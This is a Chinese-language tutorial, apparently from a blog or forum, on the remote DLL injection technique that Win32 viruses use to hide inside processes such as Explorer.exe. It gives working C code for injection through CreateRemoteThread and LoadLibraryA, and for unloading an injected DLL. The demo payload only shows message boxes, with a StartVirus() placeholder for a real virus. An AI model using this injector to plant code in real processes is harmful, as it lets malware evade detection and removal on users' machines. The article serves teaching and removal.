DLL的遠程注入技術是目前Win32病毒廣泛使用的一種技術。使用這種技術的病毒體通常位于一個DLL中,在系統啟動的時候,一個EXE程序會將這個DLL加載至某些系統進程(如Explorer.exe)中運行。這樣一來,普通的進程管理器就很難發現這種病毒了,而且即使發現了也很難清除,因為只要病毒寄生的進程不終止運行,那么這個DLL就不會在內存中卸載,用戶也就無法在資源管理器中刪除這個DLL文件,真可謂一箭雙雕哉。
記得2003年QQ尾巴病毒肆虐的時候,就已經有些尾巴病毒的變種在使用這種技術了。到了2004年初,我曾經嘗試著仿真了一個QQ尾巴病毒,但獨是跳過了DLL的遠程加載技術。直到最近在學校論壇上看到了幾位朋友在探討這一技術,便忍不住將這一塵封已久的技術從我的記憶中揀了出來,以滿足廣大的技術愛好者們。
必備知識
在閱讀本文之前,你需要了解以下幾個API函數:
OpenProcess - 用于打開要寄生的目標進程。
VirtualAllocEx/VirtualFreeEx - 用于在目標進程中分配/釋放內存空間。
WriteProcessMemory - 用于在目標進程中寫入要加載的DLL名稱。
CreateRemoteThread - 遠程加載DLL的核心內容,用于控制目標進程調用API函數。
LoadLibrary - 目標進程通過調用此函數來加載病毒DLL。
在此我只給出了簡要的函數說明,關于函數的詳細功能和介紹請參閱MSDN。
示例程序
我將在以下的篇幅中用一個簡單的示例Virus.exe來實現這一技術。這個示例的界面如下圖:
首先運行Target.exe,這個文件是一個用Win32 Application向導生成的“Hello, World”程序,用來作為寄生的目標進程。
然后在界面的編輯控件中輸入進程的名稱“Target.exe”,單擊“注入DLL”按鈕,這時候Virus.exe就會將當前目錄下的DLL.dll注入至Target.exe進程中。
在注入DLL.dll之后,你也可以單擊“卸載DLL”來將已經注入的DLL卸載。
點這里下載示例程序
模擬的病毒體DLL.dll
這是一個簡單的Win32 DLL程序,它僅由一個入口函數DllMain組成:
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved )
{
? switch ( fdwReason )
? {
? case DLL_PROCESS_ATTACH:
? ? {
? ? ? ? MessageBox( NULL, _T("DLL已進入目標進程。"), _T("信息"), MB_ICONINFORMATION );
? ? }
? ? break;
? case DLL_PROCESS_DETACH:
? ? {
? ? ? ? MessageBox( NULL, _T("DLL已從目標進程卸載。"), _T("信息"), MB_ICONINFORMATION );
? ? }
? ? break;
? }
? return TRUE;
}
如你所見,這里我在DLL被加載和卸載的時候調用了MessageBox,這是用來顯示我的遠程注入/卸載工作是否成功完成。而對于一個真正的病毒體來說,它往往就是處理DLL_PROCESS_ATTACH事件,在其中加入了啟動病毒代碼的部分:
? case DLL_PROCESS_ATTACH:
? ? {
? ? ? ? StartVirus();
? ? }
? ? break;
注入!
現在要開始我們的注入工作了。首先,我們需要找到目標進程:
DWORD FindTarget( LPCTSTR lpszProcess )
{
? DWORD dwRet = 0;
? HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
? PROCESSENTRY32 pe32;
? pe32.dwSize = sizeof( PROCESSENTRY32 );
? Process32First( hSnapshot, &pe32 );
? do
? {
? ? if ( lstrcmpi( pe32.szExeFile, lpszProcess ) == 0 )
? ? {
? ? ? ? dwRet = pe32.th32ProcessID;
? ? ? ? break;
? ? }
? } while ( Process32Next( hSnapshot, &pe32 ) );
? CloseHandle( hSnapshot );
? return dwRet;
}
這里我使用了Tool Help函數庫,當然如果你是NT系統的話,也可以選擇PSAPI函數庫。這段代碼的目的就是通過給定的進程名稱來在當前系統中查找相應的進程,并返回該進程的ID。得到進程ID后,就可以調用OpenProcess來打開目標進程了:
// 打開目標進程
HANDLE hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessID );
現在有必要說一下OpenProcess第一個參數所指定的三種權限。在Win32系統下,每個進程都擁有自己的4G虛擬地址空間,各個進程之間都相互獨立。如果一個進程需要完成跨進程的工作的話,那么它必須擁有目標進程的相應操作權限。在這里,PROCESS_CREATE_THREAD表示我可以通過返回的進程句柄在該進程中創建新的線程,也就是調用CreateRemoteThread的權限;同理,PROCESS_VM_OPERATION則表示在該進程中分配/釋放內存的權限,也就是調用VirtualAllocEx/VirtualFreeEx的權限;PROCESS_VM_WRITE表示可以向該進程的地址空間寫入數據,也就是調用WriteProcessMemory的權限。
至此目標進程已經打開,那么我們該如何來將DLL注入其中呢?在這之前,我請你看一行代碼,是如何在本進程內顯式加載DLL的:
HMODULE hDll = LoadLibrary( "DLL.dll" );
那么,如果能控制目標進程調用LoadLibrary,不就可以完成DLL的遠程注入了么?的確是這樣,我們可以通過CreateRemoteThread將LoadLibrary作為目標進程的一個線程來啟動,這樣就可以完成“控制目標進程調用LoadLibrary”的工作了。到這里,也許你會想當然地寫下類似這樣的代碼:
DWORD dwID;
LPVOID pFunc = LoadLibraryA;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, (LPVOID)"DLL.dll", 0, &dwID );
不過結果肯定會讓你大失所望——注入DLL失敗!
嗯嗯,那么現在讓我們來分析一下失敗的原因吧。我是前說過,在Win32系統下,每個進程都擁有自己的4G虛擬地址空間,各個進程之間都是相互獨立的。在這里,我們當作參數傳入的字符串"DLL.dll"其實是一個數值,它表示這個字符串位于Virus.exe地址空間之中的地址,而這個地址在傳給Target.exe之后,它指向的東西就失去了有效性。舉個例子來說,譬如A、B兩棟大樓,我住在A樓的401;那么B樓的401住的是誰我當然不能確定——也就是401這個門牌號在B樓失去了有效性,而且如果我想要入住B樓的話,我就必須請B樓的樓長為我在B樓中安排新的住處(當然這個新的住處是否401也就不一定了)。
由此看來,我就需要做這么一系列略顯繁雜的手續——首先在Target.exe目標進程中分配一段內存空間,然后向這段空間寫入我要加載的DLL名稱,最后再調用CreateRemoteThread。這段代碼就成了這樣:
// 向目標進程地址空間寫入DLL名稱
DWORD dwSize, dwWritten;
dwSize = lstrlenA( lpszDll ) + 1;
LPVOID lpBuf = VirtualAllocEx( hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE );
if ( NULL == lpBuf )
{
? CloseHandle( hProcess );
? // 失敗處理
}
if ( WriteProcessMemory( hProcess, lpBuf, (LPVOID)lpszDll, dwSize, &dwWritten ) )
{
? // 要寫入字節數與實際寫入字節數不相等,仍屬失敗
? if ( dwWritten != dwSize )
? {
? ? VirtualFreeEx( hProcess, lpBuf, dwSize, MEM_DECOMMIT );
? ? CloseHandle( hProcess );
? ? // 失敗處理
? }
}
else
{
? CloseHandle( hProcess );
? // 失敗處理
}
// 使目標進程調用LoadLibrary,加載DLL
DWORD dwID;
LPVOID pFunc = LoadLibraryA;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, lpBuf, 0, &dwID );
需要說的有兩點,一是由于我要在目標進程中為ANSI字符串來分配內存空間,所以這里凡是和目標進程相關的部分,都明確使用了后綴為“A”的API函數——當然,如果要使用Unicode字符串的話,可以換作后綴是“W”的API;第二,在這里LoadLibrary的指針我是取的本進程的LoadLibraryA的地址,這是因為LoadLibraryA/LoadLibraryW位于kernel32.dll之中,而Win32下每個應用程序都會把kernel32.dll加載到進程地址空間中一個固定的地址,所以這里的函數地址在Target.exe中也是有效的。
在調用LoadLibrary完畢之后,我們就可以做收尾工作了:
// 等待LoadLibrary加載完畢
WaitForSingleObject( hThread, INFINITE );
// 釋放目標進程中申請的空間
VirtualFreeEx( hProcess, lpBuf, dwSize, MEM_DECOMMIT );
CloseHandle( hThread );
CloseHandle( hProcess );
在此解釋一下WaitForSingleObject一句。由于我們是通過CreateRemoteThread在目標進程中另外開辟了一個LoadLibrary的線程,所以我們必須等待這個線程運行完畢才能夠釋放那段先前申請的內存。
好了,現在你可以嘗試著整理這些代碼并編譯運行。運行Target.exe,然后開啟一個有模塊查看功能的進程查看工具(在這里我使用我的July)來查看Target.exe的模塊,你會發現在注入DLL之前,Target.exe中并沒有DLL.dll的存在:
矛盾相生
記得2004年初我將QQ尾巴病毒成功仿真后,有很多網友詢問我如何才能殺毒,不過我都沒有回答——因為當時我研究的重點并非病毒的寄生特性。這一寄生特性直到今天可以說我才仿真完畢,那么,我就將解毒的方法也一并公開吧。
和DLL的注入過程類似,只不過在這里使用了兩個API:GetModuleHandle和FreeLibrary。出于篇幅考慮,我略去了與注入部分相似或相同的代碼:
// 使目標進程調用GetModuleHandle,獲得DLL在目標進程中的句柄
DWORD dwHandle, dwID;
LPVOID pFunc = GetModuleHandleA;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, lpBuf, 0, &dwID );
// 等待GetModuleHandle運行完畢
WaitForSingleObject( hThread, INFINITE );
// 獲得GetModuleHandle的返回值
GetExitCodeThread( hThread, &dwHandle );
// 釋放目標進程中申請的空間
VirtualFreeEx( hProcess, lpBuf, dwSize, MEM_DECOMMIT );
CloseHandle( hThread );
// 使目標進程調用FreeLibrary,卸載DLL
pFunc = FreeLibrary;
hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, (LPVOID)dwHandle, 0, &dwID );
// 等待FreeLibrary卸載完畢
WaitForSingleObject( hThread, INFINITE );
CloseHandle( hThread );
CloseHandle( hProcess );
用這個方法可以卸載一個進程中的DLL模塊,當然包括那些非病毒體的DLL。所以,這段代碼還是謹慎使用為好。
在完成卸載之后,如果沒有別的程序加載這個DLL,你就可以將它刪除了。